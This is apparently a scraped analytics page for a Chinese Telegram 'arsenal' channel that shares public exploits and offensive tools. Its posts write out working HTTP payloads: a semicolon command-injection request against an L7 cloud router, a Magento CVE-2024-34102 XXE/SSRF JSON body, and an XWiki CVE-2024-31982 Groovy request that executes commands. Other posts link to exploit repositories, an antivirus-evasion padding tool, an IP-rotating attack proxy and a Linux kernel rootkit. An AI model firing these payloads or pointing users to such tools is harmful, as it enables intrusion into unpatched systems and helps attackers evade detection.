Hacker_🇨🇳-军火库
御魂 公开频道军火库欢迎各位 : poc/exploit 公开. 恶意软件 漏洞利用 研究攻击手法 分析蓝队溯源 ,脚本 源码 工具 等 or各种攻击方式。
Більше4 211
Підписники
-424 години
+447 днів
+23530 днів
- Підписники
- Перегляди допису
- ER - коефіцієнт залучення
Триває завантаження даних...
Приріст підписників
Триває завантаження даних...
碧海威L7云路由 confirm 命令执行漏洞
GET /notice/confirm.php?t=;ping%20 HTTP/1.1
#exploit #poc #IoT
https://github.com/watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806
Exploit for the CVE-2024-5806
#github #exploit
👍 3
https://github.com/mertdas/SharpIncrease
A Tool that aims to evade av with binary padding
#github #bypass
https://github.com/blacklanternsecurity/TREVORproxy
A SOCKS proxy written in Python that randomizes your source IP address. Round-robin your evil packets through SSH tunnels or give them billions of unique source addresses!
#github #tools #proxy
https://github.com/blacklanternsecurity/TREVORproxy
A SOCKS proxy written in Python that randomizes your source IP address. Round-robin your evil packets through SSH tunnels or give them billions of unique source addresses!
#github #tools #proxy
GitHub - blacklanternsecurity/TREVORproxy: A SOCKS proxy written in Python that randomizes your source IP address. Round-robin your evil packets through SSH tunnels or give them billions of unique source addresses!
A SOCKS proxy written in Python that randomizes your source IP address. Round-robin your evil packets through SSH tunnels or give them billions of unique source addresses! - blacklanternsecurity/TR...
https://github.com/bjrjk/CVE-2024-29943
CVE-2024-29943
#github #poc
CVE-2024-34102
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://url/","dataIsURL":true,"options":12345678}}}}}}
http://url
#exploit #poc
cve-2024-31982
GET /bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1
GET /xwiki//bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1
id
#exploit #poc
https://github.com/m0nad/Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)
#github #tools #rootkit
🥰 2
Оберіть інший тариф
На вашому тарифі доступна аналітика тільки для 5 каналів. Щоб отримати більше — оберіть інший тариф.